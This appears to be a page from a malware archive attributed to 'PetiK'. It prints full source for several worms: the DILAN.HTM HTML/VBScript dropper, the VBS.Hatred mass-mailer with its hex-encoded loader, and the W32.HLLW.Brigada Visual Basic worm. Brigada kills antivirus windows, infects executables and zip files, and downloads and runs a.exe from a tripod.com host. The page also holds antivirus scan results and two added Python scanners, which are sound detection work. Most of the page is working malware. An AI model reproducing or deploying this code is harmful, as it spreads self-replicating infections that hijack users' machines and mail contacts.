db 'r.Close',CRLF
db 'ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ScanW32",fso.GetSpecialFolder(0)&"\scanner.exe"',CRLF,CRLF
db 'infect(fso.GetSpecialFolder(0))',CRLF
db 'infect(fso.GetSpecialFolder(1))',CRLF
db 'infect(fso.GetSpecialFolder(2))',CRLF
db 'infect(ws.SpecialFolders("MyDocuments"))',CRLF
db 'infect(ws.SpecialFolders("Desktop"))',CRLF,CRLF
db 'MsgBox "Sorry but your browser can''t read this Web file."',CRLF
db 'End If',CRLF,CRLF
db 'Function infect(dir)',CRLF
db 'If fso.FolderExists(dir) Then',CRLF
db 'For each cible in fso.GetFolder(dir).Files',CRLF
db 'ext=lcase(fso.GetExtensionName(cible.Name))',CRLF
db 'If ext="htm" or ext="html" Then',CRLF
db 'Set gd=fso.OpenTextFile(cible.path,1)',CRLF
db 'If gd.readline <> "<dilan>" Then',CRLF
db 'htmorg=gd.Readall',CRLF
db 'gd.Close',CRLF
db 'Set gd=fso.OpenTextFile(cible.path,2)',CRLF
db 'gd.WriteLine "<dilan>"',CRLF
db 'gd.Write(htmorg)',CRLF
db 'gd.WriteLine document.body.createtextrange.htmltext',CRLF
db 'gd.Close',CRLF
db 'Else',CRLF
db 'gd.Close',CRLF
db 'End If',CRLF
db 'End If',CRLF
db 'Next',CRLF
db 'End If',CRLF
db 'End Function',CRLF,CRLF
db 'Function dec(octe)',CRLF
db 'On Error Resume Next',CRLF
db 'For hexad = 1 To Len(octe) Step 2',CRLF
db 'dec = dec & Chr("&h" & Mid(octe, hexad, 2))',CRLF
db 'Next',CRLF
db 'End Function',CRLF
db '</script></body></html>',CRLF
e_htm:

ends
end start

DILAN.HTM

<dilan>
<html><head><title>Only For You!</title></head><body>
<script language=vbscript>
On Error Resume Next
Set fso=createobject("scripting.filesystemobject")
Set ws=createobject("wscript.shell")
If err.number=429 then
document.write "<font face size='4' color=black>You need ActiveX enabled to see this file<br><a href='javascript:location.reload()'>Click Here</a> to reload and CLICK YES</font>"
Else
asmhex="4D5A50000200000004000F00FFFF..."
read = dec(asmhex)
Set r = fso.CreateTextFile(fso.GetSpecialFolder(0)&"\scanner.exe", 2)
r.Write read
r.Close
ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ScanW32",fso.GetSpecialFolder(0)&"\scanner.exe"

infect(fso.GetSpecialFolder(0))
infect(fso.GetSpecialFolder(1))
infect(fso.GetSpecialFolder(2))
infect(ws.SpecialFolders("MyDocuments"))
infect(ws.SpecialFolders("Desktop"))

MsgBox "Sorry but your browser can't read this Web file."
End If

Function infect(dir)
If fso.FolderExists(dir) Then
For each cible in fso.GetFolder(dir).Files
ext=lcase(fso.GetExtensionName(cible.Name))
If ext="htm" or ext="html" Then
Set gd=fso.OpenTextFile(cible.path,1)
If gd.readline <> "<dilan>" Then
htmorg=gd.Readall
gd.Close
Set gd=fso.OpenTextFile(cible.path,2)
gd.WriteLine "<dilan>"
gd.Write(htmorg)
gd.WriteLine document.body.createtextrange.htmltext
gd.Close
Else
gd.Close
End If
End If
Next
End If
End Function

Function dec(octe)
On Error Resume Next
For hexad = 1 To Len(octe) Step 2
dec = dec & Chr("&h" & Mid(octe, hexad, 2))
Next
End Function
</script></body></html>
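The samples above all leave the same kind of fingerprints behind: a first-line re-infection marker (`<dilan>` and `<vbshtmpark>` in HTM files, `'VBS.Park` and `'Mars` in VBS files), fixed drop names (`DebugW32.exe`, `Doctor.exe`, `scanner.exe`, `LoveVSHatred.vbs`, `start.vbs`, `doctor.vbs`, `dilan.htm`), `<name>.exe_vbpe.exe` companion copies, a `Run` value named `Debug`, `DocTor`, `ScanW32` or `LVSH`, and a hex string starting with the `MZ` header (`4D5A`) sitting next to a `Chr("&h" & Mid(...))` decoder loop. The following scanner is an added example written for this page, not part of PetiK's archive; it only reads files and reports, and the sample HTML, file names and Run-key dump it is run against are constructed here, not taken from a real infection.

```python
"""Scan a directory tree for the infection markers and drop artefacts used by
the worms listed on this page (added defensive example, not from the archive)."""
import os
import re
from typing import Dict, List

# First-line markers each worm writes so it does not re-infect a file.
FIRST_LINE_MARKERS = {
    "<dilan>": "W32/HTML.Dilan infected HTML",
    "<vbshtmpark>": "VBS.Park infected HTML",
    "'VBS.Park": "VBS.Park prepended VBS",
    "'Mars": "VB.Mars dropped start.vbs",
}
# File names the worms copy themselves to or create (lower-cased for lookup).
DROPPED_NAMES = {
    "debugw32.exe": "VB.Mars copy (System dir)",
    "start.vbs": "VB.Mars startup dropper",
    "doctor.exe": "W32.DocTor copy (Windows dir)",
    "doctor.vbs": "W32.DocTor startup script",
    "scanner.exe": "W32/HTML.Dilan copy (Windows dir)",
    "dilan.htm": "W32/HTML.Dilan seed HTML (My Documents)",
    "lovevshatred.vbs": "VBS.Hatred copy (Windows dir)",
}
# Value names the worms register under HKLM\...\CurrentVersion\Run.
RUN_VALUE_NAMES = {
    "debug": "VB.Mars",
    "doctor": "W32.DocTor",
    "scanw32": "W32/HTML.Dilan",
    "lvsh": "VBS.Hatred",
}
# Generic dropper shape: a hex-encoded PE header plus the VBScript hex decoder loop.
HEX_PE_RE = re.compile(r'"4D5A[0-9A-Fa-f]{4,}', re.IGNORECASE)
DECODER_RE = re.compile(r'Chr\(\s*"&h"\s*&\s*Mid\(', re.IGNORECASE)


def scan_content(name: str, content: str) -> List[str]:
    """Pure check on one file's name and text; returns a list of findings."""
    findings: List[str] = []
    lname = name.lower()
    if lname in DROPPED_NAMES:
        findings.append(DROPPED_NAMES[lname])
    if lname.endswith("_vbpe.exe"):
        findings.append("VB.Mars companion copy (<exe>_vbpe.exe)")
    first_line = content.split("\n", 1)[0].rstrip("\r")
    if first_line in FIRST_LINE_MARKERS:
        findings.append(FIRST_LINE_MARKERS[first_line])
    if HEX_PE_RE.search(content) and DECODER_RE.search(content):
        findings.append("hex-encoded PE with VBScript decoder (generic dropper)")
    return findings


def scan_tree(root: str, max_bytes: int = 2_000_000) -> Dict[str, List[str]]:
    """Walk root read-only and report every file with at least one finding."""
    report: Dict[str, List[str]] = {}
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            path = os.path.join(dirpath, fn)
            try:
                with open(path, "rb") as fh:
                    raw = fh.read(max_bytes)
            except OSError:
                continue
            # The droppers are ANSI text; latin-1 never fails and keeps byte positions.
            hits = scan_content(fn, raw.decode("latin-1"))
            if hits:
                report[path] = hits
    return report


def check_run_values(values: Dict[str, str]) -> List[str]:
    r"""Flag Run-key value names the page's worms register.
    `values` is {value_name: command} as exported from HKLM\...\CurrentVersion\Run."""
    return [
        f"{name}={cmd} ({RUN_VALUE_NAMES[name.lower()]})"
        for name, cmd in values.items()
        if name.lower() in RUN_VALUE_NAMES
    ]


# Constructed samples (not from the page): one infected HTML, one clean one, a Run dump.
SAMPLE_INFECTED_HTML = "<dilan>\r\n<html><head><title>Only For You!</title></head><body>\r\n"
SAMPLE_CLEAN_HTML = '<html><body><a href="mailto:a@b.c">x</a></body></html>\r\n'
SAMPLE_RUN_VALUES = {
    "ctfmon.exe": "C:\\WINDOWS\\system32\\ctfmon.exe",
    "ScanW32": "C:\\WINDOWS\\scanner.exe",
}

if __name__ == "__main__":
    import tempfile

    with tempfile.TemporaryDirectory() as tmp:
        for fn, body in (("index.htm", SAMPLE_INFECTED_HTML),
                         ("clean.htm", SAMPLE_CLEAN_HTML),
                         ("calc.exe_vbpe.exe", "")):
            with open(os.path.join(tmp, fn), "w", newline="") as fh:
                fh.write(body)
        for path, hits in scan_tree(tmp).items():
            print(path, "->", "; ".join(hits))
    for line in check_run_values(SAMPLE_RUN_VALUES):
        print("Run:", line)
```

`scan_content` is kept free of I/O so the same checks can be fed by an EDR file-event stream or a forensic image mount; `scan_tree` is the plain filesystem driver. The Run-key check takes a dictionary rather than touching the registry so it runs the same on an exported hive as on a live host.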
File Dilan.exe received on 05.16.2009 11:30:36 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Worm.Win32.Petik!IK
AhnLab-V3 5.0.0.2 2009.05.15 Win-Trojan/Dilna.5120
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.B2
Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Petik
Authentium 5.1.2.4 2009.05.15 W32/Dilan.A
Avast 4.8.1335.0 2009.05.15 Win32:Petik-B
AVG 8.5.0.336 2009.05.15 I-Worm/Petik.B
BitDefender 7.2 2009.05.16 Win32.Petik.J@mm
CAT-QuickHeal 10.00 2009.05.15 Worm.Petik.b
ClamAV 0.94.1 2009.05.15 Worm.Petik.B
Comodo 1157 2009.05.08 Worm.Win32.Petik.AD
DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.20480
eSafe 7.0.17.0 2009.05.14 Win32.Petik.b
eTrust-Vet 31.6.6508 2009.05.16 Win32/Petik.5120.C
F-Prot 4.4.4.56 2009.05.15 W32/Dilan.A
F-Secure 8.0.14470.0 2009.05.15 Worm.Win32.Petik.b
Fortinet 3.117.0.0 2009.05.16 W32/Petik.F
GData 19 2009.05.16 Win32.Petik.J@mm
Ikarus T3.1.1.49.0 2009.05.16 Worm.Win32.Petik
K7AntiVirus 7.10.735 2009.05.14 Worm.Win32.Petik.b
Kaspersky 7.0.0.125 2009.05.16 Worm.Win32.Petik.b
McAfee 5616 2009.05.15 W32/PetTick.aj
McAfee+Artemis 5616 2009.05.15 W32/PetTick.aj
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.B2
Microsoft 1.4602 2009.05.16 Worm:Win32/Dilna.A
NOD32 4080 2009.05.15 Win32/Petik.AD
Norman 6.01.05 2009.05.16 W32/Pet_Tick.Int
nProtect 2009.1.8.0 2009.05.16 -
Panda 10.0.0.14 2009.05.15 Worm Generic
PCTools 4.4.2.0 2009.05.15 Worm.Petik
Prevx 3.0 2009.05.16 Medium Risk Malware
Rising 21.29.52.00 2009.05.16 Worm.Win32.Petik.b
Sophos 4.41.0 2009.05.16 W32/Dilna-A
Sunbelt 3.2.1858.2 2009.05.16 Worm.Win32.Petik.b
Symantec 1.4.4.12 2009.05.16 W95.Pet_Tick.gen
TheHacker 6.3.4.1.326 2009.05.15 W32/Petik.b
TrendMicro 8.950.0.1092 2009.05.15 TROJ_DILNA.A
VBA32 3.12.10.5 2009.05.16 Worm.Win32.Petik.b
ViRobot 2009.5.15.1737 2009.05.15 Worm.Win32.Petik.5120
VirusBuster 4.6.5.0 2009.05.15 I-Worm.Petdil.A

Additional information
File size: 5120 bytes
MD5...: e56a9313f5b25300de504cdce5c84bd8
SHA1..: 6901d7cc53cc5a3223fd9efe399082b119e80cf6
PEiD..: Crypto-Lock v2.02 (Eng) -> Ryan Thian
' Name : VBS.Hatred
' Author : PetiK
' Language : VBS
' Date : 29/06/2002

On Error Resume Next

Set fso=CreateObject("Scripting.FileSystemObject")
Set ws=CreateObject("WScript.Shell")
orig=WScript.ScriptFullName
fcopy=fso.GetSpecialFolder(0) & "\LoveVSHatred.vbs"

Call Copy(orig,fcopy)

If orig=fcopy Then
list(ws.SpecialFolders("MyDocuments"))
list(fso.GetSpecialFolder(0))

Do
Set out=CreateObject("Outlook.Application")
Set map=out.GetNameSpace("MAPI")
For each c In map.AddressLists
If c.AddressEntries.Count <> 0 Then
For d = 1 To c.AddressEntries.Count
Set wpalr = out.CreateItem(0)
wpalr.To = c.AddressEntries(d).Address
wpalr.Subject = "Love or Hatred"
wpalr.Body = "Open this file and choice..."
wpalr.Attachments.Add(WScript.ScriptFullName)
wpalr.DeleteAfterSubmit = True
If wpalr.To <> "" Then
wpalr.Send
End If
Next
End If
Next
Loop

End If

Sub Copy(src,dst)
fso.CopyFile orig,fcopy
ws.RegWrite "HKLM\Software\Microsoft\Windows\Currentversion\Run\LVSH",fcopy
End Sub

Sub list(dir)
For Each f1 In fso.GetFolder(dir).SubFolders
infect(f1.Path)
list(f1.Path)
Next
End Sub

Sub infect(dir)
For Each fil In fso.GetFolder(dir).Files
ext = fso.GetExtensionName(fil.Path)
ext = lCase(ext)
If (ext = "htm") or (ext = "html") Then
Set h=fso.OpenTextFile(fil.Path,1)
scnm=h.ReadAll
h.Close

For j = 1 To Len(scnm)
If Mid(scnm, j, 7) = "mailto:" Then
mlto = ""
cnt = 0
Do While Mid(scnm, j + 7 + cnt, 1) <> """"
mlto = mlto + Mid(scnm, j + 7 + cnt, 1)
cnt = cnt + 1
Loop

SendMail(mlto)
End If
Next
End If
Next
End Sub

Sub SendMail(email)
On Error Resume Next
Dim out
Set out = CreateObject("Outlook.Application")
Set mel = out.CreateItem(0)
mel.To = email
mel.Subject = "Love or Hatred ??"
mel.Body = "Open this attached file and you will know if you have the love or the hatred"
mel.Attachments.Add(WScript.ScriptFullName)
mel.Attachments.Add (WScript.ScriptFullName)
mel.Send
Set out = Nothing
End Sub

Encrypted version

On Error Resume Next

Execute Q("4F6E204572726F7220526573756D65204E6...57874A456E6420537562")
Function Q(swpe)
For O=1 To Len(swpe) Step 2
Q=Q & Chr("&h" & Mid(swpe,O,2))
Next
End Function

'Encrypt with the PetiK's VBS Hex Convert Tool
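As an added analyst-side example (not part of the original archive or the author's tool), the Python below detects the `Execute Q("<hex>")` loader shape shown above, undoes the Q() hex-to-Chr conversion and reports which suspicious strings the decoded payload contains. The sample script and its payload are constructed here, since the page's own hex string is truncated.

```python
import re

# Shape of the loader on the page: Execute Q("<hex>") with Q() turning each hex pair into Chr().
EXECUTE_HEX_RE = re.compile(r'Execute\s+(\w+)\s*\(\s*"([0-9A-Fa-f]+)"\s*\)')

# API names and strings whose appearance in a decoded payload deserves a closer look.
SUSPICIOUS_MARKERS = (
    "Outlook.Application",
    "Scripting.FileSystemObject",
    "RegWrite",
    "Attachments.Add",
    "mailto:",
    "CurrentVersion\\Run",
)


def hex_to_vbs(hexstr: str) -> str:
    """Undo the page's Q() routine: two hex digits -> one character, as Chr("&h" & pair) does."""
    if len(hexstr) % 2:
        raise ValueError("odd-length hex string")
    return bytes.fromhex(hexstr).decode("latin-1")


def vbs_to_hex(text: str) -> str:
    """Inverse of hex_to_vbs; used only to build the constructed sample below."""
    return text.encode("latin-1").hex().upper()


def find_hex_loaders(script: str) -> list:
    """Return (decoder_name, decoded_payload) for every Execute X("hex") call in a script."""
    return [(m.group(1), hex_to_vbs(m.group(2))) for m in EXECUTE_HEX_RE.finditer(script)]


def triage(script: str) -> dict:
    """Decode all hex loaders and report which suspicious markers the hidden code contains."""
    loaders = find_hex_loaders(script)
    markers = set()
    for _, payload in loaders:
        lowered = payload.lower()
        markers.update(m for m in SUSPICIOUS_MARKERS if m.lower() in lowered)
    return {
        "loaders": len(loaders),
        "markers": sorted(markers),
        "payloads": [payload for _, payload in loaders],
    }


# Constructed sample (not the page's truncated hex): a short payload that writes a Run
# value, wrapped exactly the way the page's Execute Q(...) loader wraps it.
SAMPLE_PAYLOAD = (
    'On Error Resume Next\r\n'
    'Set ws=CreateObject("WScript.Shell")\r\n'
    'ws.RegWrite "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\LVSH","x"\r\n'
)
SAMPLE_SCRIPT = (
    'On Error Resume Next\r\n'
    f'Execute Q("{vbs_to_hex(SAMPLE_PAYLOAD)}")\r\n'
    'Function Q(swpe)\r\n'
    'For O=1 To Len(swpe) Step 2\r\n'
    'Q=Q & Chr("&h" & Mid(swpe,O,2))\r\n'
    'Next\r\n'
    'End Function\r\n'
)

if __name__ == "__main__":
    report = triage(SAMPLE_SCRIPT)
    print(f"hex loaders: {report['loaders']}, markers: {report['markers']}")
    for payload in report["payloads"]:
        print("--- decoded payload ---")
        print(payload)
```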


File Hatred.vbs received on 05.16.2009 17:42:47 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Email-Worm.VBS.Lee.Based!IK
AhnLab-V3 5.0.0.2 2009.05.16 VBS/Kristen
AntiVir 7.9.0.168 2009.05.15 Worm/Lee-based.3
Antiy-AVL 2.0.3.1 2009.05.15 Worm/VBS.VBS
Authentium 5.1.2.4 2009.05.16 VBS/Kristen.G@mm
Avast 4.8.1335.0 2009.05.15 VBS:VBSWG family@enc
AVG 8.5.0.336 2009.05.15 Worm/Generic_c.IH
BitDefender 7.2 2009.05.16 VBS.Hatred.A@mm
CAT-QuickHeal 10.00 2009.05.15 VBS/Kristen.G
ClamAV 0.94.1 2009.05.16 -
Comodo 1157 2009.05.08 Unclassified Malware
DrWeb 5.0.0.12182 2009.05.16 VBS.Generic
eSafe 7.0.17.0 2009.05.14 -
eTrust-Vet 31.6.6508 2009.05.16 VBS/Kristen.G
F-Prot 4.4.4.56 2009.05.16 VBS/Kristen.G@mm
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.VBS.Lee-based
Fortinet 3.117.0.0 2009.05.16 VBS/Anjulie.C
GData 19 2009.05.16 VBS.Hatred.A@mm
Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.VBS.Lee.Based
K7AntiVirus 7.10.737 2009.05.16 -
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.VBS.Lee-based
McAfee 5616 2009.05.15 VBS/LoveLetter.gen
McAfee+Artemis 5616 2009.05.15 VBS/LoveLetter.gen
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Lee-based.3
Microsoft 1.4602 2009.05.16 Virus:VBS/Leebased
NOD32 4080 2009.05.15 VBS/Lee-based
Norman 6.01.05 2009.05.16 VBS/Lee-based.U
nProtect 2009.1.8.0 2009.05.16 -
Panda 10.0.0.14 2009.05.16 Worm Generic
PCTools 4.4.2.0 2009.05.16 Virtool.Hex2VBS.A
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 Worm.Mail.VBS.Lee-based.n
Sophos 4.41.0 2009.05.16 VBS/Hatred-A
Sunbelt 3.2.1858.2 2009.05.16 -
Symantec 1.4.4.12 2009.05.16 VBS.LoveLetter.Var
TheHacker 6.3.4.1.326 2009.05.15 VBS/LoveLetter.gen
TrendMicro 8.950.0.1092 2009.05.15 VBS_ANJULIE.C
VBA32 3.12.10.5 2009.05.16 Email-Worm.VBS.Lee-based
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.16 Virtool.Hex2VBS.A

Additional information
File size: 4043 bytes
MD5...: 0917a7ca2afb01dc26afc99f642c0b6f
SHA1..: aa809d611ba4ba26e9c4d65aeba3239888a0da79
' Name : W32.HLLW.Brigada
' Author : PetiK & alc0paul
' Language : Visual Basic
' Date : 02/07/2002
'
'
'
'
Attribute VB_Name = "Module1"
Option Explicit
Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (pDst As Any, pSrc As
Any, ByVal ByteLen As Long)
Private Declare Function GetCommandLine Lib "kernel32" Alias "GetCommandLineA" () As Long
Private Declare Function lstrlen Lib "kernel32" Alias "lstrlenA" (ByVal lpString As Long)
As Long
Private Declare Function SHGetPathFromIDList Lib "shell32.dll" Alias
"SHGetPathFromIDListA" (ByVal pidl As Long, ByVal pszPath As String) As Long
Private Declare Function SHGetSpecialFolderLocation Lib "shell32.dll" (ByVal hwndOwner As
Long, ByVal nFolder As Long, pidl As ITEMIDLIST) As Long
Private Declare Function PostMessage Lib "user32" Alias "PostMessageA" (ByVal hwnd As
Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName
As String, ByVal lpWindowName As String) As Long
Private Declare Function ExitWindowsEx Lib "user32" (ByVal uFlags As Long, ByVal
dwReserved As Long) As Long
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal
bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Private Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long,
lpExitCode As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private Declare Function InternetGetConnectedState Lib "wininet.dll" (ByRef lpdwFlags As
Long, ByVal dwReserved As Long) As Long
Private iResult As Long
Private hProg As Long
Private idProg As Long
Private iExit As Long
Const WM_CLOSE = &H10
Const STILL_ACTIVE As Long = &H103
Const PROCESS_ALL_ACCESS As Long = &H1F0FFF
Const EWX_SHUTDOWN = 1
Const CSIDL_PERSONAL = &H5
Const CSIDL_STARTUP = &H7
Const CSIDL_TIF = &H20
Const CSIDL_WIN = &H24
Const CSIDL_WINSYS = &H25
Const MAX_PATH = 260
Private Type SHITEMID
cb As Long
abID As Byte
End Type
Private Type ITEMIDLIST
mkid As SHITEMID
End Type
Sub Main()
On Error Resume Next
Dim vdir As String
Dim lenhost As String
Dim vc As String
Dim mark As String
Dim hostlen As String
Dim virlen As String
Dim buffhostlen As String
Dim buffvirlen As String
Call regcall
Call killav
vdir = App.path
If Right(vdir, 1) <> "\" Then vdir = vdir & "\"
FileCopy vdir & App.EXEName & ".exe", GetSpecialfolder(CSIDL_WIN) & "\Ms0701i32.exe"
FileCopy vdir & App.EXEName & ".exe", GetSpecialfolder(CSIDL_WINSYS) & "\lolita.exe"
'--------------- check if virus or worm ------------------------
Open vdir & App.EXEName & ".exe" For Binary Access Read As #1
lenhost = (LOF(1))
vc = Space(lenhost)
Get #1, , vc
Close #1
mark = Right(vc, 2)
If mark <> "b8" Then
'worm
Call extrkzip
If InStr(1, GetCommLine, "-petikb8") = 0 Then
Else
Call wording
Call zipinfect
End If
If InStr(1, GetCommLine, "-alcopaulb8") = 0 Then
Else
Call virustime
End If
If InStr(1, GetCommLine, "-trojanmode") = 0 Then
Else
ShutdownWindows EWX_SHUTDOWN
End If
listht GetSpecialfolder(CSIDL_TIF)
Else
'virus : execute the host
Open vdir & App.EXEName & ".exe" For Binary Access Read As #4
hostlen = (LOF(4) - 75264)
virlen = (75264) 'worm/virus + zip component
buffhostlen = Space(hostlen)
buffvirlen = Space(virlen)
Get #4, , buffvirlen
Get #4, , buffhostlen
Close #4
Open vdir & "XxX.exe" For Binary Access Write As #3
Put #3, , buffhostlen
Close #3
'borrowed from murkry's vb5 virus
idProg = Shell(vdir & "XxX.exe", vbNormalFocus)
hProg = OpenProcess(PROCESS_ALL_ACCESS, False, idProg)
GetExitCodeProcess hProg, iExit
Do While iExit = STILL_ACTIVE
DoEvents
GetExitCodeProcess hProg, iExit
Loop
Kill vdir & "XxX.exe"
End If
'-------------------------------------------------------------------
Call downloader
End Sub
'---------------------- kill avs --------------------------------------
Sub killav()
On Error Resume Next
Dim avn, avn1, avn2, avn3, avn4, avn5, avn6, avn7, avn8, avn9, avn10, avn11, avn12
Dim aWindow As Long
Dim angReturnValue As Long
Dim num3, arrr3, av
avn = "Pop3trap"
avn1 = "JavaScan"
avn2 = "Modem Booster"
avn3 = "vettray"
avn4 = "Timer"
avn5 = "CD-Rom Monitor"
avn6 = "F-STOPW Version 5.06c"
avn7 = "PC-cillin 2000 : Virus Alert"
avn8 = "DAPDownloadManager"
avn9 = "Real-time Scan"
avn10 = "IOMON98"
avn11 = "AVP Monitor"
avn12 = "NAI_VS_STAT"
For num3 = 0 To 12
arrr3 = Array(avn, avn1, avn2, avn3, avn4, avn5, avn6, avn7, avn8, avn9, avn10, avn11,
avn12)
av = arrr3(num3)
aWindow = FindWindow(vbNullString, av)
angReturnValue = PostMessage(aWindow, WM_CLOSE, vbNull, vbNull)
Next num3
End Sub
'-------------------------- download update and run it ----------------------
Sub downloader()
On Error Resume Next
Dim databyte() As Byte
If InternetGetConnectedState(0&, 0&) = 0 Then GoTo xIt
Form1.Inet1.RequestTimeout = 40
databyte() = Form1.Inet1.OpenURL("http://p0th0le.tripod.com/a.exe", icByteArray)
Open "c:\update.exe" For Binary Access Write As #2
Put #2, , databyte()
Close #2
Shell "c:\update.exe", vbHide
xIt:
End Sub
'----------------------c:\WINDOWS file infection----------------
Sub virustime()
On Error Resume Next
Dim vdir As String
Dim sfile As String
Dim a As String
Dim arr1
Dim lenhost As String
Dim vc As String
Dim mark As String
Dim host
vdir = App.path
If Right(vdir, 1) <> "\" Then vdir = vdir & "\"
sfile = dir$(GetSpecialfolder(CSIDL_WIN) & "\*.exe")
While sfile <> ""
a = a & sfile & "/"
sfile = dir$
Wend
arr1 = Split(a, "/")
For Each host In arr1
Open GetSpecialfolder(CSIDL_WIN) & "\" & host For Binary Access Read As #1
lenhost = (LOF(1))
vc = Space(lenhost)
Get #1, , vc
Close #1
mark = Right(vc, 2)
If mark <> "b8" Then
GoTo notinfected
Else
GoTo gggoop
End If
notinfected:
infect (GetSpecialfolder(CSIDL_WIN) & "\" & host)
Exit For
gggoop:
Next host
End Sub
Function infect(hostpath As String)
On Error Resume Next
Dim ffile
Dim hostcode As String
Dim vir As String
Dim vircode As String
Dim header As String
Dim f As String
vir = App.path
If Right(vir, 1) <> "\" Then vir = vir & "\"
Open hostpath For Binary Access Read As #1
hostcode = Space(LOF(1))
Get #1, , hostcode
Close #1
Open vir & App.EXEName & ".exe" For Binary Access Read As #2
header = Space(LOF(2))
Get #2, , header
Close #2
f = "b8"
Open hostpath For Binary Access Write As #3
Put #3, , header
Put #3, , hostcode
Put #3, , f
Close #3
End Function
'--------------------zip infection-----------------------------
Sub zipinfect()
On Error Resume Next
list ("c:\")
End Sub

Sub list(dir)
On Error Resume Next
Dim fso, ssf, fil
Set fso = CreateObject("Scripting.FileSystemObject")
Set ssf = fso.GetFolder(dir).SubFolders
For Each fil In ssf
infection (fil.path)
list (fil.path)
Next
End Sub

Sub infection(dir)
Dim fso, cf, fil, ext
Set fso = CreateObject("Scripting.FileSystemObject")
Set cf = fso.GetFolder(dir).Files
For Each fil In cf
ext = fso.GetExtensionName(fil.path)
ext = LCase(ext)
If (ext = "zip") Then
Shell "c:\piss.exe " & fil.path & " " & GetSpecialfolder(CSIDL_WINSYS) & "\lolita.exe",
vbHide
End If
Next
End Sub
'--------------------trojan mode payload-----------------------------
Sub ShutdownWindows(ByVal intParamater As Integer)
Dim blnReturn As Boolean
blnReturn = ExitWindowsEx(intParamater, 0)
End Sub
'--------------------variable commandline-----------------------------
Sub regcall()
On Error Resume Next
Dim b As String, c As String, d As String, ws As Object
Dim regcol, final
Set ws = CreateObject("WScript.Shell")
b = "-alcopaulb8"
c = "-petikb8"
d = "-trojanmode"
regcol = Array(b, c, d)
Randomize
final = regcol(Int(Rnd * 3))
ws.regwrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\b8",
GetSpecialfolder(CSIDL_WINSYS) & "\Ms0701i32.exe " & final
If dir("c:\regedit.exe") <> "regedit.exe" Then
FileCopy GetSpecialfolder(CSIDL_WIN) & "\regedit.exe", "c:\regedit.exe"
End If
End Sub
'--------------------extract zip software-----------------------------
Sub extrkzip()
On Error Resume Next
Dim vdir As String
Dim wormlen As String
Dim rarlen As String
Dim buffwormlen As String
Dim buffrarlen As String
vdir = App.path
If Right(vdir, 1) <> "\" Then vdir = vdir & "\"
Open vdir & App.EXEName & ".exe" For Binary Access Read As #1
wormlen = (LOF(1) - 63488)
rarlen = (63488)
buffwormlen = Space(wormlen)
buffrarlen = Space(rarlen)
Get #1, , buffwormlen
Get #1, , buffrarlen
Close #1
Open "c:\piss.exe" For Binary Access Write As #2
Put #2, , buffrarlen
Close #2
Shell "c:\piss.exe c:\brigada8.zip " & vdir & App.EXEName & ".exe", vbHide
End Sub
'--------------------e-mail collect and e-mailing-----------------------------
Sub listht(dir)
On Error Resume Next
Dim fso, ssfh, filh
Set fso = CreateObject("Scripting.FileSystemObject")
Set ssfh = fso.GetFolder(dir).SubFolders
For Each filh In ssfh
infht (filh.path)
listht (filh.path)
Next
End Sub

Sub infht(dir)
Dim mlto As String
Dim fso, cfh, filh, ext, textline, q
Dim j As Long, cnt As Long
Set fso = CreateObject("Scripting.FileSystemObject")
Set cfh = fso.GetFolder(dir).Files
For Each filh In cfh
ext = fso.GetExtensionName(filh.path)
ext = LCase(ext)
If (ext = "htm") Or (ext = "html") Then
Open filh.path For Input As #1
Do While Not EOF(1)
Line Input #1, textline
q = q & textline
Loop
Close #1
For j = 1 To Len(q)
If Mid(q, j, 7) = "mailto:" Then
mlto = ""
cnt = 0
Do While Mid(q, j + 7 + cnt, 1) <> """"
mlto = mlto + Mid(q, j + 7 + cnt, 1)
cnt = cnt + 1
Loop
Call Worming(mlto)
End If
Next
End If
Next
End Sub
Function Worming(mail As String)
On Error Resume Next
Dim a, b, c
Set a = CreateObject("Outlook.Application")
Set b = a.GetNameSpace("MAPI")
If a = "Outlook" Then
b.Logon "profile", "password"
Set c = a.CreateItem(0)
c.Recipients.Add mail
c.Subject = "check us out"
c.Body = "we exist to give everyone a smiley face... :)"
c.Attachments.Add "c:\brigada8.zip"
c.Send
c.DeleteAfterSubmit = True
b.Logoff
End If
End Function
'--------------------commandline parser-----------------------------
Private Function GetCommLine() As String
Dim RetStr As Long, SLen As Long
Dim Buffer As String
RetStr = GetCommandLine
SLen = lstrlen(RetStr)
If SLen > 0 Then
GetCommLine = Space$(SLen)
CopyMemory ByVal GetCommLine, ByVal RetStr, SLen
End If
End Function
'--------------------get special folder-----------------------------
Private Function GetSpecialfolder(CSIDL As Long) As String
Dim r As Long
Dim IDL As ITEMIDLIST
Dim path As String
r = SHGetSpecialFolderLocation(100, CSIDL, IDL)
If r = 0 Then
path$ = Space$(512)
r = SHGetPathFromIDList(ByVal IDL.mkid.cb, ByVal path$)
GetSpecialfolder = Left$(path, InStr(path, Chr$(0)) - 1)
Exit Function
End If
GetSpecialfolder = ""
End Function
'------------------ document infection ---------------------------
Sub wording()
On Error Resume Next
Dim vdir As String
vdir = App.path
If Right(vdir, 1) <> "\" Then vdir = vdir & "\"
FileCopy vdir & App.EXEName & ".exe", "c:\XXXview.exe"
